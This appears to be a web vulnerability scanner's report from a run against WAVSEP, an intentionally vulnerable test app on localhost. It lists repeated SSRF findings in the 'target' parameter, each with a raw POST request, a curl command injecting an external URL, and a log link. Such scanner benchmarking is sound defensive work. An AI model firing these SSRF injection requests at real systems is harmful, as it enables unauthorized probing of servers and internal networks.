SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1905/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1906/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1907/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1910/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1911/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1913/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1914/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1919/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1921/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1922/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1923/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1927/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1931/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1933/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:33+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1934/746172676574/1527559533-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1936/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1937/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1940/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1943/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1945/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1948/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1952/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1953/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1954/746172676574/1527559539-174.119.60.74.txt
